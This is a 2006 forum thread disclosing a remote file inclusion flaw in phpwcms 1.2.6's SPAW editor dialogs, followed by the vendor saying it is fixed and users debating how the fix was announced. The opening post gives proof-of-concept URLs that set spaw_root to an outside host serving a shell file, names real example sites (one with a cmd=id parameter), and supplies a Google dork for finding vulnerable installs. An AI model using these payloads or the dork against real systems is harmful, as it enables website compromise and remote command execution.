CRITICAL SECURITY BUG!!!!!

kingless · Post by **kingless** » Thu 10. Aug 2006, 19:04

PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities

Vuln In :
include $spaw_root.'class/lang.class.php';

Affected Files :
include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php

Vendor Website: http://www.phpwcms.de/

PoC:
http://victim-site/include/inc_ext/spaw ... ttp://ehmo
rgan.net/shell.dat?

Example:
http://132.195.14.67/phpwcms/include/in ... paw_root=h
ttp://ehmorgan.net/shell.dat?

Example working:
http://www.acvz.com/phpwcms/include/inc ... xt?&cmd=id

Google Dork:

inurl:"phpwcms/index.php?id="

This One was hacked today by some hackers > http://www.saalburg-ebersdorf.de/phpwcm ... 10,0,0,1,0

Fix it Quickliy

Post by **Oliver Georgi** » Sat 12. Aug 2006, 18:31

A bit late message - this is a known thing and it is fixed. Check current release here.

Oliver

Post by **flip-flop** » Sat 12. Aug 2006, 18:34

I have called the webmaster saalburg-ev..... via e-Mail, but no answer.
His site is up, and I hope updated. ........

Schulterzuck.

Knut

kingless · Post by **kingless** » Sat 12. Aug 2006, 20:28

Oliver Georgi wrote:A bit late message - this is a known thing and it is fixed. Check current release here.

Oliver

yeah... but you must tell people that you have fixed an critical security bug an that they must update as quickly as possible.

Pappnase · Post by **Pappnase** » Thu 17. Aug 2006, 06:25

kingless wrote:
Oliver Georgi wrote:A bit late message - this is a known thing and it is fixed. Check current release here.

Oliver
yeah... but you must tell people that you have fixed an critical security bug an that they must update as quickly as possible.

hello

all get an mail! in the forum was a big thread, at the projectsite there was also infos about that and last also at the docu page!